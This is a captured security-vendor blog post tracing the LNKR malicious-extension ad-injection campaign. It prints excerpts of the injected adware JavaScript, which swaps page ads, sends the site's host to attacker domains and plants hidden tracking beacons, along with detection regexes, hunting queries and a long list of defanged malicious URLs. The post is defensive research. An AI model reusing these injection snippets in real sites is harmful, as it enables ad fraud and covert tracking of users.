www.perimeterx.com Open in urlscan Pro
2400:6180:0:d1::611:8001  Public Scan

URL: https://www.perimeterx.com/tech-blog/2020/the-missing-lnkr/
Submission: On January 14 via manual from JP — Scanned from JP

Form analysis 1 forms found in the DOM

<form action="" onsubmit="LO.submit_chat(); return false;" __bizdiag="-357996863" __biza="W___">
  <div id="lo_chat_input" style="position:relative; width: 100%; ">
    <div class="lo-fx-hr" style="height:0px; margin-bottom:0px; margin-top:0px; width:100%; border-top:1px solid #000000;border-bottom:1px solid #4f4f4f"></div>
    <div style="padding:10px;"><label for="lo_chat_textarea" style="display:none">Chat Input Box</label><textarea id="lo_chat_textarea" disabled="disabled" rows="2"
        style="color: black; background-color: rgb(255, 255, 255); border-radius: 5px; padding: 7px; height: auto; width: 100%; font-family: sans-serif; text-transform: none; resize: none;" dir="null" data-last-scroll-height="0"></textarea></div>
    <div id="lo_chat_sound_holder" style="position:absolute; right:0px; top:-25px; width:100%;">
      <div style="cursor: pointer; float:right; opacity:0.6; padding-right:10px; height:16px;" id="lo_chat_sound"><img alt="Click to mute chat sounds" src="https://d10lpsik1i8c69.cloudfront.net/graphics/sound-on-white.png"></div>
      <div id="lo_chat_status" style="padding-left:10px; font-size:11px; color:#6d6d6d"></div>
      <div style="clear:both;"></div>
    </div>
  </div>
</form>

Text Content

 * Subscribe
 * Careers
 * Visit PerimeterX.com
 * Search

 * Tech Blog
 * The Missing LNKR


THE MISSING LNKR

by Ben BaryoOctober 22, 2020
 * Share
 * 
 * 
 * 
 * 



How we connected several incidents our clients’ end-users experienced to a broad
ad injection campaign spanning end-users across much of our customer base.


FIRST INCIDENTS

During a new integration of PerimeterX Code Defender in July, the customer
alerted us that they had received complaints that several of their end users had
experienced fraud after submitting payment details into their website. Our
review of the code running on their website revealed nothing malicious.

We then used our visibility into their site and found a very small percentage of
end users experiencing Javascript injections which contacted unexpected domains.
The small number of affected users made it not likely to be a Magecart attack,
as those usually run on as many users as possible instead of a small subset, but
we wanted to dot all the i’s and cross all the t’s to verify this wasn’t a more
elaborate, targeted attack.

The unexpected domains we encountered, guxuladebu[.]com and wejekihota[.]com,
have been registered as recently as 04/2020 and were both tagged as high-risk by
our domain intelligence provider. The scripts which were detected in the
compromised sessions were injected into the payment iframe, and taking a close
look at them revealed unobfuscated code, which included comments and full
variable names. The scripts seemingly “only” inject ads and trackers into the
page.


THE INITIAL ADWARE INJECTION

The opening lines of one of the injections:

var alreadyLoadedMnz = true;
try {
   if (typeof(alreadyLoadedFdzScript) == "undefined") {
       var euPlugin = true;
       var alreadyLoadedFdzScript = true;
       var mainPluginKey = "8kime1SUSnpFEB9EJs$JTA";
       var countryPlugin = "br";

The injected scripts, losudu.guxuladebu[.]com/scripts/js and
fevoki.wejekihota[.]com/scripts/js, both with object and method names such as
fdzAdsManager, fdzNativeAds, pushMoreProducts, and replaceAds, it was easy to
figure out what was going on; The script would seek out existing ads’ elements
and iframes on the page - such as youtube ads, taboola, ligatus or outbrain -
and replace them with its own ads.

replaceAds: function (format, element) {
 return new Promise(function (resolve) {
   if (element.height > 200) {
     jKiri.getJSON(
         dynamicURL('https://debezihe[.]wejekihota[.]com/assets/nataurl?width='
         + element.width + '&height=' + element.height + '&h='
         + btoa(document.location.host) + '&pk=' + mainPluginKey + '&callback=?'),
       null, function (json) {
         if (json.url) {
           if (jKiri('.native_adn').length >= fdzNativeAds.limit) {
             return resolve();
           }
           if (!document.body.contains(element.item[0])) {
             return resolve();
           }
           element.item.replaceWith(jKiri('<iframe class="native_adn" src="'
               + json.url + '" width="' + element.width + '" height="'
               + element.height
               + '" style="border:none;display:block;margin:auto" />'));
           if (json.boost_type && json.boost_type == "ctz") {
             fdzNativeAds.trackEvent("show", "native_ads_ctz", element.width + "x"
               + element.height, json.url);
           } else if (json.boost_type && json.boost_type == "adthink") {
             fdzNativeAds.trackEvent("show", "native_ads_adthink", element.width + "x"
               + element.height, json.url);
           } else {
             fdzNativeAds.trackEvent("show", "native_ads", element.width + "x"
               + element.height, json.url);
           }
           return resolve();
         } else {
           return resolve();
         }
     });
   } else {
     return resolve();
   }
 })
}

It would read specific input fields, such as on google’s shopping tab and other
geo-specific sites (the scripts we first analyzed included targeted French
speaking users) and inject ads based on the search query, with specific
hardcoded categories such as flights and car rentals.


FSGROUP AND GOOGLE SEARCH RESULTS

These Fdz variables can be found on sites as early as 2017, but a more
interesting find was the injection of another script from
www.searchdirect[.]info/script/kr.php?uid=F248A67B54944A7A45101F4426CF894C&a=8383_
which starts with declaring a few unique variables:

var fsgroup = "28";
var trkid = '5f10493b02471';
var uid = 'F248A67B54944A7A45101F4426CF894C';
var affid = '8383';
var dom = 'www.searchdirect[.]info';

This file is another adware which replaces google’s search results with its own
ads, based on a detected keyword in the query string. The script then fake
clicks its injected ads to generate revenue. It also tracks which ads are
displayed on the page and injects beacon trackers.


ANOTHER INJECTION

Another suspicious injection was found to be hosted on Amazon’s AWS:
s3.amazonaws[.]com/jscache/19ff3cca12e47e3099.js and was much noisier than the
previous two:

(function(f, i, j) {
   var g = "19ff3cca12e47e3099";
   var b = (function() {
       var l = 3;
       var p = parseInt("0");
       var o = parseInt("0");
       (function() {
           var r = ["mid=", "wid=52190", "sid=", "tid=6655", "rid=LAUNCHED"];
           a = (window.location.protocol == "http:" ? "http:" : "https:") + "//promlinkdev[.]com/metric/?" + r.join("&");
           var q = f.createElement("img");
           q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
           q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
           (document.head || document.documentElement).appendChild(q);
           if (typeof q.onload != j) {
               q.onload = function() {
                   q.parentNode && q.parentNode.removeChild(q)
               }}})();

It is minimized, and includes among other things:

 * Methods to report to C2 (Command & Control) and receive callback functions to
   run
 * A hardcoded list of specific domains and TLDs not to inject to
   E.g. lotterysambadresult[.]in, paypal[.]com, anything [.]gov, etc…
 * A hardcoded list of sites to inject specific banners to, most are in the
   Russian language
   E.g. mail[.]ru, rambler[.]ru, mysearch[.]com, securesurf[.]biz, etc...
 * Static ads injections as iframes
 * Injections of affiliation links
 * Facebook injection
 * Geolocation based injection allow and deny lists
 * Redirection of searches to affiliated search engines
 * Ability to inject nodes to input fields and textareas

Besides the fact that it’s much more robust and sophisticated than the previous
injection, there was once again the loading of another script,
www.findsearchresults[.]info/script/r.php?a=3200&uid=52190x0000xzzzzzzzzzzzzzzzzzzzzz
which turned out to be another fsgroup script, mostly identical to the last one:

var fsgroup = "20";
var trkid = '5f201f06995c8';
var uid = '52190X0000XZZZZZZZZZZZZZZZZZZZZZ';
var affid = '3200';
var dom = 'www.findsearchresults[.]info';


UNDER THE RADAR

These couple of injections were seen in a small percentage of end-users, and
coupled with the lack of evidence for the site being compromised, we assumed it
must be a client-side injection, probably malware based, or a malicious browser
extension. There was no further action to be taken.


THINGS ARE CLEARER THE SECOND TIME AROUND

A couple of days later, another incident surfaced. Though the offending
injection originated from a domain tagged as high-risk, it was a match for the
script injected from AWS: hardyload[.]com/22783aa0106c0e89f2.js

(function(f, i, j) {
   var g = "22783aa0106c0e89f2";
   var b = (function() {
       var l = 3;
       var p = parseInt("0");
       var o = parseInt("0");
       (function() {
           var r = ["mid=", "wid=52658", "sid=", "tid=8824", "rid=LAUNCHED"];
           a = (window.location.protocol == "http:" ? "http:" : "https:") + "//hardyload[.]com/metric/?" + r.join("&");
           var q = f.createElement("img");
           q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
           q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
           (document.head || document.documentElement).appendChild(q);
           if (typeof q.onload != j) {
               q.onload = function() {
                   q.parentNode && q.parentNode.removeChild(q)
               }}})();

And just like the previous case, it also loaded the fsgroup script, this time
from www.findsearchresults[.]info/script/r.php?a=...

Again, not many sessions displayed this injection and so this was considered to
be another case of client-side malware / rogue extension.


CONNECTING THE DOTS

While there were two different initial injections, the one starting with
alreadyLoadedMnz and the one with the /metric/? in its path, both were adware
and both injected the fsgroup script. The injections were also only witnessed in
a relatively negligent number of sessions, but we were interested in knowing if
this was perhaps a targeted attack against the customer’s users or a general
case of client-side infection.


EXTRACTING IOCS

To better understand the spread of these injections, we extracted the following
regexp IoCs:

 * /script/js\?k=
 * /metric/?\?mid=
   For both /metric/?mid= and /metric?mid=
 * /optout/[gs]et
   For both /optout/get and /optout/set
 * ^(https?:)?//[^/]+?/[a-f0-9]{18}\.js$
   Pretty generic, but surprisingly returns good results. A good way to remove
   false positives is to verify both letters and numbers make up the filename


IS IT JUST ME?

Armed with the IoCs, we searched across our customers for compromised end-users
in the past week, and found:

 * About 120 different domains with requests matching our IoCs
 * Almost all of our Code Defender customers had compromised users visiting
   their sites
 * The number of compromised users wasn’t significant compared to the number of
   overall visitors to the site

The numbers aren’t staggering to say the least, but from week to week they were
consistent and everywhere.

The injections seems to be coming from either Chrome or Firefox browsers, and
not from mobile devices, reaffirming our hypothesis that this was a case of
malicious extension / client-side malware:




WHERE THINGS GOT INTERESTING

One of the tools we use during our investigation is HTTP Archive which we
usually search using Google’s BigQuery. We were wondering if perhaps we could
find the injections somewhere else on the web. We first looked for more
occurrences of the injections we already have; perhaps finding them in context
will yield new information? If they are indeed client-side injections we expect
not to find any matches. So we first searched for sites which communicate with
our already seen domains:

SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE 
  REGEXP_CONTAINS(url, r'.*(guxuladebu\.com|wejekihota\.com|searchdirect\.info|findsearchresults\.info).*');

And surprisingly we found injections matching those we’ve seen! Not many, but we
weren’t expecting to find any! We looked for more examples by searching for
unique strings within the injections:

SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE
  body LIKE '%/log/?l=error&m="%'
  OR body LIKE "var alreadyLoadedMnz%";

This yielded almost 300 results, from different sites, with the injected scripts
coming from different domains, with the request URLs all matching our IoCs.

We got practically the same results when we searched for our IoCs with the
following query:

SELECT DISTINCT page FROM `httparchive.requests.2020_08_01_desktop`
WHERE 
  (REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f0-9]{18}\.js$')
  AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[0-9]{18}\.js$')
  AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f]{18}\.js$'))
  OR REGEXP_CONTAINS(url, r'.*(/script/js\?k=|/optout/[gs]et).*');

Why would what we thought was a client-side injection be embedded into sites?


THE MISSING LNKR

Intrigued, we looked further into the domains involved, and found one of them,
cdnapps[.]us, was registered with the email frankomedison1020@gmail.com and a
quick google search led us to a KrebsOnSecurity blog entry from March, 2020
which described a similar situation to what we started with, attributed to
malicious extensions. The extensions might not have started malicious but were
later sold to new owners who turned them into adware. Krebs goes on to suggest
how sites were embedded with the same injections - the sites were edited
in-browser, while a malicious extension was running in the background, which
resulted in malicious code injected into the pages during the online edit.

A more recent blog entry from Netskope refers to this as a LNKR campaign, named
after a string found in its earlier iterations back in 2016.

A security researcher named Paul Buonopane has described the LNKR injections,
gave several IoCs, and also analyzed a fake extension which was a copy of a
legit extension with the malicious injections appended to it.


WHAT DO YOU MEAN IT’S ALREADY TAKEN CARE OF?

Now that we had a firmer grasp of what our customers were facing, we knew where
to look for guarding against an extension injecting into the session: PerimeterX
Page Defender. As it turned out, all of our Page Defender customers were already
covered, as any request matching one of the IoCs was already spotted and
blocked.


TO CONCLUDE

We hope that sharing our journey from the first incident to the identification
of the threat and finding the right tool for remediation will give you insight
into the way we look at threats. At PerimeterX we research different web
threats, from hacked servers, through compromised 3rd-party vendors, to
client-side injections. Owing to that we were able to connect the dots and
quickly identify the solution - Page Defender, which already blocks the
malicious extensions from interfering with the session. Our products sharing a
platform means we can leverage intel and capabilities for quick deployment of
solutions.


BUT WHAT CAN YOU DO AS AN END-USER?

As obvious as It may sound, It’s important to stay cautious and look for warning
signs when downloading extensions. If at any time you notice changes in your
browsing experience (unexpected ads, links being added, etc...) you should
review the extensions installed on your browser, perhaps turning them off one at
a time to identify the culprit, and consider uninstalling those which are no
longer relevant.


ADDENDUM: ADWARE URLS

Though not exhaustive, this list includes more than 350 URLs which matched the
IoCs mentioned above. We wanted to include just the domains at first, but since
not all of these domains are inherently malicious (as is the case of
amazonaws[.]com), the domain + path can be used to detect the existence of this
adware in the network.

minisrclink[.]cool/metric/

cosmeticsrc[.]com/metric/

mikkiload[.]com/metric/

miragework[.]com/metric/

dakotaram[.]com/metric/

dogsamily[.]net/metric/

cilkonlay[.]com/metric/

cosmeticsrc[.]com/optout/get

peterfire[.]net/metric/

qalitygigant[.]com/metric/

fileryjon[.]com/metric/

cosmeticsrc[.]com/optout/set/lat

cosmeticsrc[.]com/optout/set/lt

minisrclink[.]cool/optout/get

minisrclink[.]cool/optout/set/lat

minisrclink[.]cool/optout/set/lt

hardyload[.]com/metric/

mikkiload[.]com/optout/set/lat

mikkiload[.]com/optout/set/lt

mikkiload[.]com/optout/get

cozytech[.]biz/metric/

cosmeticsrc[.]com/2171de9c9971669bb5.js

autroliner[.]com/metric/

joyshoul[.]com/metric/

practiclick[.]xyz/metric/

petercontry[.]net/metric/

clicksapp[.]net/metric/

loungesrc[.]net/metric/

jaretsummer[.]com/metric/

biglinksrc[.]cool/metric/

tracksmall[.]com/metric/

makesure[.]biz/metric/

blinkjork[.]com/metric/

trableflick[.]com/metric/

tribedone[.]org/metric/

dimagesrc[.]com/metric/

simonzody[.]com/metric/

amptylogick[.]com/metric/

dogsamily[.]net/optout/get

miragework[.]com/optout/get

miragework[.]com/optout/set/lat

miragework[.]com/optout/set/lt

massehight[.]com/metric/

goldapps[.]org/metric/

mirakay[.]biz/metric/

dogsamily[.]net/optout/set/lat

dogsamily[.]net/optout/set/lt

peterfire[.]net/optout/set/lat

peterfire[.]net/optout/set/lt

joyshoul[.]com/optout/set/lat

joyshoul[.]com/optout/set/lt

peterfire[.]net/optout/get

losudu.guxuladebu[.]com/scripts/js

qalitygigant[.]com/optout/set/lat

qalitygigant[.]com/optout/set/lt

mikkiload[.]com/2299156fcd9f4015b0.js

proxdevcool[.]com/metric/

qalitygigant[.]com/optout/get

criticalltech[.]com/metric/

keanyjoy[.]com/metric/

joyshoul[.]com/optout/get

craftprimes[.]com/metric/

ciclonrox[.]com/metric/

cosmeticsrc[.]com/optout/set/strtm

cosmeticsrc[.]com/optout/set/userid

cilkonlay[.]com/optout/get

blancfox[.]com/metric/

cilkonlay[.]com/optout/set/lat

cilkonlay[.]com/optout/set/lt

untsorce[.]cool/metric/

acountscr[.]cool/metric/

milkpload[.]net/metric/

pagescr[.]cool/metric/

peterfire[.]net/22a3c76046f79dd0be.js

qalitygigant[.]com/227ee61cbd084e801b.js

mikkiload[.]com/22bc07df48b043c1f3.js

dimagesrc[.]com/21b4eb3b66b8d5e9bb.js

joyshoul[.]com/22bd1a92d57466cd6c.js

dakotaram[.]com/22f6f6120c25710dec.js

fileryjon[.]com/optout/get

fileryjon[.]com/optout/set/lat

fileryjon[.]com/optout/set/lt

clipsold[.]com/metric/

fileryjon[.]com/1ddcff471efda26278.js

minisrclink[.]cool/1e40c8bd4601a5a5a4.js

clicksapp[.]net/215bde2d6ed49fe715.js

clicksapp[.]net/215d9d5ddc1c1332ef.js

mabydick[.]com/metric/

autroliner[.]com/optout/get

autroliner[.]com/optout/set/lat

autroliner[.]com/optout/set/lt

data1.molaroute[.]com/scripts/js

kellyfight[.]com/metric/

statsrc[.]cool/metric/

makesure[.]biz/1dbe49b2db08327925.js

makesure[.]biz/optout/set/lat

makesure[.]biz/optout/set/lt

appslinker[.]net/metric/

hardyload[.]com/optout/set/lat

hardyload[.]com/optout/set/lt

leepraktic[.]net/metric/

makesure[.]biz/optout/get

proghage[.]com/metric/

cehute.ramitetuha[.]com/scripts/js

contendevff[.]com/metric/

craftprimes[.]com/optout/set/lat

craftprimes[.]com/optout/set/lt

data1.routepilipinas[.]com/scripts/js

biglinksrc[.]cool/optout/get

biglinksrc[.]cool/optout/set/lat

biglinksrc[.]cool/optout/set/lt

poruce.neyelanane[.]com/scripts/js

craftprimes[.]com/optout/get

jemova.wurucozujo[.]com/scripts/js

webnicolas[.]net/metric/

blancfox[.]com/1ff0d80f515755dcf2.js

craftprimes[.]com/20618468c2f7627774.js

giraslide[.]com/metric/

autroliner[.]com/225cd6e1ef3a4470f9.js

tracksmall[.]com/optout/set/lat

tracksmall[.]com/optout/set/lt

tribedone[.]org/optout/get

tribedone[.]org/optout/set/lat

biglinksrc[.]cool/1ee798437b5f5d4f98.js

dowlextff[.]com/metric/

fuhupo.lohuwomenu[.]com/scripts/js

mirakay[.]biz/optout/get

mirakay[.]biz/optout/set/lat

mirakay[.]biz/optout/set/lt

petercontry[.]net/optout/set/lat

petercontry[.]net/optout/set/lt

tracksmall[.]com/optout/get

joyshoul[.]com/optout/set/strtm

joyshoul[.]com/optout/set/userid

petercontry[.]net/optout/get

promclickapp[.]biz/1e6ab715a3a95d4603.js

ruzozi.locixugoro[.]com/scripts/js

tribedone[.]org/optout/set/lt

blinkjork[.]com/optout/set/lat

blinkjork[.]com/optout/set/lt

dowlextff[.]com/1d61f2beb014840140.js

hardyload[.]com/optout/set/strtm

hardyload[.]com/optout/set/userid

skillapp[.]net/metric/

blinkjork[.]com/optout/get

crisdomson[.]com/metric/

ideafrank[.]com/metric/

keanyjoy[.]com/optout/get

poligloteapp[.]org/metric/

trableflick[.]com/optout/get

amptylogick[.]com/22a1d8e534b29520d0.js

amptylogick[.]com/optout/get

amptylogick[.]com/optout/set/lat

amptylogick[.]com/optout/set/lt

crisgrey[.]com/188f9ebcdf6890da18.js

darkflags[.]net/metric/

keanyjoy[.]com/optout/set/lat

keanyjoy[.]com/optout/set/lt

mirakay[.]biz/optout/set/strtm

mirakay[.]biz/optout/set/userid

practiclick[.]xyz/optout/set/lat

practiclick[.]xyz/optout/set/lt

promfflinkdev[.]com/1dc30897dfecc6dc73.js

simonzody[.]com/20c3dc56895944c2b8.js

trableflick[.]com/optout/set/lat

tribedone[.]org/20ca34c96a123576ab.js

cilkonlay[.]com/21890722da51ec3508.js

comtakelink[.]xyz/metric/

criticalltech[.]com/optout/get

criticalltech[.]com/optout/set/lat

criticalltech[.]com/optout/set/lt

hardyload[.]com/optout/get

loungesrc[.]net/optout/set/lat

loungesrc[.]net/optout/set/lt

practiclick[.]xyz/optout/get

proxdevcool[.]com/optout/get

proxdevcool[.]com/optout/set/lat

simonzody[.]com/optout/get

simonzody[.]com/optout/set/lat

simonzody[.]com/optout/set/lt

singtraff[.]cool/metric/

goldapps[.]org/optout/get

goldapps[.]org/optout/set/lat

goldapps[.]org/optout/set/lt

jaretsummer[.]com/optout/get

jaretsummer[.]com/optout/set/lat

jaretsummer[.]com/optout/set/lt

practiclick[.]xyz/151d61b828942a88fe.js

proxdevcool[.]com/optout/set/lt

trableflick[.]com/optout/set/lt

tribedone[.]org/20cebcfbc0d833c4d4.js

untsorce[.]cool/optout/set/lat

untsorce[.]cool/optout/set/lt

zerafe.dodecawube[.]com/scripts/js

appslinker[.]net/2135df0d2c8958bb24.js

contendevff[.]com/optout/get

crisdomson[.]com/optout/set/lat

crisdomson[.]com/optout/set/lt

dogsamily[.]net/optout/set/strtm

dogsamily[.]net/optout/set/userid

files-js-ext.s3.us-east-2.amazonaws[.]com/22fae55717eaadaf7d.js

ideafrank[.]com/optout/get

petercontry[.]net/optout/set/strtm

petercontry[.]net/optout/set/userid

protesidenext[.]com/metric/

tracksmall[.]com/2279d81d48c75df8ff.js

untsorce[.]cool/optout/get

amptylogick[.]com/optout/set/strtm

amptylogick[.]com/optout/set/userid

biglinksrc[.]cool/1ece0ed8f49de8d8d2.js

buvihi.xixuzutage[.]com/scripts/js

ciclonrox[.]com/optout/set/lat

ciclonrox[.]com/optout/set/lt

contendevff[.]com/167dc90a2dac606b7f.js

contendevff[.]com/optout/set/lat

contendevff[.]com/optout/set/lt

data1.blicougi[.]com/scripts/js

fevoki.wejekihota[.]com/scripts/js

icelandsue[.]com/metric/

loungesrc[.]net/2263eddcb82daefb75.js

loungesrc[.]net/optout/get

peterfire[.]net/optout/set/strtm

peterfire[.]net/optout/set/userid

platewolf[.]com/metric/

plusdroop[.]net/metric/

proghage[.]com/200321535194dcd04f.js

proghage[.]com/optout/get

proghage[.]com/optout/set/lat

proghage[.]com/optout/set/lt

promfflinkdev[.]com/1dbde180289f843d45.js

untsorce[.]cool/1f90ebeaf3ebeede5d.js

acountscr[.]cool/1e3de9b8ae5c976faf.js

blinkloide[.]com/metric/

ciclonrox[.]com/optout/get

clicksapp[.]net/21604a2096b709a1b4.js

data1.bmi-result[.]com/scripts/js

data1.padirmua[.]com/scripts/js

giraslide[.]com/optout/get

goldapps[.]org/1bb8d5dee1eb4904d8.js

goldapps[.]org/2249d46c4ea44f4b35.js

jigepu.macudivida[.]com/scripts/js

jozeha.levitokitu[.]com/scripts/js

linkangood[.]com/21ef897172770ca75d.js

milkpload[.]net/optout/get

milkpload[.]net/optout/set/lat

milkpload[.]net/optout/set/lt

pagescr[.]cool/16dc1947c10ee7d085.js

pagescr[.]cool/optout/get

pagescr[.]cool/optout/set/lat

pagescr[.]cool/optout/set/lt

practiclick[.]xyz/18b181560802361ac2.js

proudflex[.]org/213db237bbd6bf854a.js

transmapp[.]com/22876adb33772fed1c.js

tribedone[.]org/optout/set/strtm

tribedone[.]org/optout/set/userid

untsorce[.]cool/optout/set/strtm

untsorce[.]cool/optout/set/userid

webnicolas[.]net/optout/get

webnicolas[.]net/optout/set/lat

webnicolas[.]net/optout/set/lt

wusote.hirizasune[.]com/scripts/js

acountscr[.]cool/optout/get

acountscr[.]cool/optout/set/lat

acountscr[.]cool/optout/set/lt

billyjons[.]net/21db1c5c8b372aecca.js

blinkjork[.]com/2169d6bf46fe8cf4e4.js

brigstoneapp[.]com/metric/

clicksapp[.]net/216bf7a0541cc1f953.js

cloudjs.netlify[.]com/1b0166cba6a2cf5418.js

comtakelink[.]xyz/1efc51d492f1470cde.js

comtakelink[.]xyz/optout/get

comtakelink[.]xyz/optout/set/lat

comtakelink[.]xyz/optout/set/lt

crisdomson[.]com/optout/get

darkflags[.]net/optout/get

data1.amorff[.]com/scripts/js

data1.arirs[.]com/scripts/js

data1.emizol[.]com/scripts/js

data1.ilipol[.]com/scripts/js

data1.pletar[.]com/scripts/js

giraslide[.]com/optout/set/lat

giraslide[.]com/optout/set/lt

ideafrank[.]com/optout/set/lat

ideafrank[.]com/optout/set/lt

kafiro.kuwinesume[.]com/scripts/js

kellyfight[.]com/optout/get

kellyfight[.]com/optout/set/lat

kellyfight[.]com/optout/set/lt

leepraktic[.]net/optout/get

leepraktic[.]net/optout/set/lat

leepraktic[.]net/optout/set/lt

mabydick[.]com/optout/get

mabydick[.]com/optout/set/lat

mabydick[.]com/optout/set/lt

massehight[.]com/optout/get

massehight[.]com/optout/set/lat

massehight[.]com/optout/set/lt

miragework[.]com/2255f170533dc275d7.js

mocadi.wisoyekivo[.]com/scripts/js

pingclock[.]net/21db1c5c8b372aecca.js

sijeno.fufesikera[.]com/scripts/js

skillapp[.]net/optout/get

skillapp[.]net/optout/set/lat

skillapp[.]net/optout/set/lt

smackbolt[.]com/2092da88402465d887.js

statsrc[.]cool/1f15217cf56f39194a.js

statsrc[.]cool/optout/get

statsrc[.]cool/optout/set/lat

statsrc[.]cool/optout/set/lt

trableflick[.]com/2271398b0972c49255.js

blancfox[.]com/1f2cf4f473fe9a5b05.js

blancfox[.]com/optout/get

blancfox[.]com/optout/set/lat

blancfox[.]com/optout/set/lt

brigstoneapp[.]com/22c4d87c9433e6bd0d.js

brigstoneapp[.]com/optout/set/lat

brigstoneapp[.]com/optout/set/lt

ciclonrox[.]com/21d4a10d5bc3d00d52.js

clipsold[.]com/21b344a7264ba4c14a.js

clipsold[.]com/optout/set/lat

clipsold[.]com/optout/set/lt

clipsold[.]com/optout/set/strtm

clipsold[.]com/optout/set/userid

cloudjs.netlify[.]com/1aff3cd773129c7ef9.js

crisdomson[.]com/optout/set/strtm

crisdomson[.]com/optout/set/userid

darkflags[.]net/optout/set/lat

darkflags[.]net/optout/set/lt

data1.ahjilop[.]com/scripts/js

data1.argmeteo[.]com/scripts/js

data1.grasow[.]com/scripts/js

data1.motibaba[.]com/scripts/js

data1.plantul[.]com/scripts/js

dekixu.sepopesuja[.]com/scripts/js

dimagesrc[.]com/optout/get

dimagesrc[.]com/optout/set/lat

dimagesrc[.]com/optout/set/lt

fileryjon[.]com/1a855c56ef7ae15d9d.js

hardyload[.]com/22783aa0106c0e89f2.js

hejana.lejesigufi[.]com/scripts/js

jebaye.gumagerudo[.]com/scripts/js

jejoro.miyinokejo[.]com/scripts/js

joyglasses[.]net/metric/

kellyfight[.]com/optout/set/strtm

kellyfight[.]com/optout/set/userid

luzino.kumureyole[.]com/scripts/js

makesure[.]biz/1c9285ea04bd586ce3.js

meyune.jaceloregi[.]com/scripts/js

minisrclink[.]cool/optout/set/strtm

minisrclink[.]cool/optout/set/userid

najiwu.xeyutezepo[.]com/scripts/js

plankjock[.]com/20c1f9347f59cf976e.js

platewolf[.]com/optout/get

plusdroop[.]net/optout/get

protesidenext[.]com/d7903748defdb4e905.js

protesidenext[.]com/optout/get

protesidenext[.]com/optout/set/lat

protesidenext[.]com/optout/set/lt

singtraff[.]cool/1e807542320a86c32c.js

singtraff[.]cool/optout/get

singtraff[.]cool/optout/set/lat

singtraff[.]cool/optout/set/lt

singtraff[.]cool/optout/set/strtm

singtraff[.]cool/optout/set/userid

skillapp[.]net/21449c4855c9415c00.js

vedeyo.razegawomi[.]com/scripts/js

wocaga.fecukuhote[.]com/scripts/js

yatulo.yibivacaji[.]com/scripts/js

yotejo.cevocoxuhu[.]com/scripts/js

 * Share
 * 
 * 
 * 
 * 


 * BEN BARYO
   
   Cyber Security Researcher in R&D
   
    * 


JOIN OUR GROWING TEAM

Explore Openings


EXPLORE MORE

 * blog
   
   
   PROPAGATING PHISHING VIA SLACK WEBHOOKS
   
   Read More
   by Amir Shaked
 * Bot Protection
   
   
   CAPTCHA-SOLVERS: SOLVED
   
   Read More
   by Carmel Gur
 * Digital Skimming and Magecart
   
   
   THE EVOLUTION OF A MAGECART ATTACK LEVERAGING THE RECAPTCHA.TECH DOMAIN
   
   Read More
   by Ben Baryo


PRODUCTS

 * 
 * ALL PRODUCTS
 * Bot Defender
 * Code Defender
 * Credential Intelligence
 * Page Defender
 * Hype Sales Protection
 * Integrations
 * Platform


SOLUTIONS

 * INDUSTRY
 * Digital Enterprises
 * E-commerce
 * Financial Services
 * Food Delivery Services
 * Travel and Hospitality
 * Media

 * THREATS
 * Account Takeover
 * Carding
 * Denial of Inventory and Scalping
 * Digital Skimming and Magecart

 * 
 * PII Harvesting
 * Skewed Analytics
 * Web Scraping


RESOURCES

 * ALL RESOURCES
 * Case Studies
 * E-books
 * Infographics
 * Podcasts
 * Product Briefs

 * 
 * Reports
 * Solution Briefs
 * Tools
 * Videos
 * Webinars
 * Whitepapers

 * 
 * Learning Center
 * 
 * Blog
 * Tech Blog
 * 
 * Compliance
 * Services and Support


ABOUT

 * 
 * ABOUT US
 * Careers
 * Contact Us
 * Events
 * Leadership

 * 
 * Logo
 * Newsroom
 * Partners

© PerimeterX, Inc. All rights reserved.
 * 
 * 
 * 
 * 
 * 

 * Privacy Policy
 * CA Privacy Rights

 * ContactUs
 * RequestDemo














PRIVACY PREFERENCE CENTER

When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
Allow All


MANAGE CONSENT PREFERENCES

TARGETING COOKIES

Targeting Cookies

These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.

Cookies Details‎

FUNCTIONAL COOKIES

Functional Cookies

These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.

Cookies Details‎

ESSENTIAL WEBSITE COOKIES

Essential Website Cookies

 * STRICTLY NECESSARY COOKIES
   
   Always Active
   
   These cookies are necessary for the website to function and cannot be
   switched off in our systems. They are usually only set in response to actions
   made by you which amount to a request for services, such as setting your
   privacy preferences, logging in or filling in forms. You can set your browser
   to block or alert you about these cookies, but some parts of the site will
   not then work. These cookies do not store any personally identifiable
   information.

 * PERFORMANCE COOKIES
   
   Switch Label label
   
   These cookies allow us to count visits and traffic sources so we can measure
   and improve the performance of our site. They help us to know which pages are
   the most and least popular and see how visitors move around the site. All
   information these cookies collect is aggregated and therefore anonymous. If
   you do not allow these cookies we will not know when you have visited our
   site, and will not be able to monitor its performance.

Cookies Details‎


BACK BUTTON PERFORMANCE COOKIES



Vendor Search Search Icon
Filter Icon

Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label


 * 33ACROSS
   
   HOST DESCRIPTION
   
   VIEW COOKIES
   
   
    * Name
      cookie name

Confirm My Choices



PERIMETERX COOKIE POLICY

We use cookies to ensure the proper function of this website and to improve your
website experience. Click “Accept Cookies” to agree to the current cookie
settings or click “Manage Preferences” to make individual choices and get
details on the cookies in use. For additional information relating to your
privacy take a look at our privacy policy.

Cookies Settings Accept All Cookies





×
–

undefined



Chat Input Box

Chat
Powered by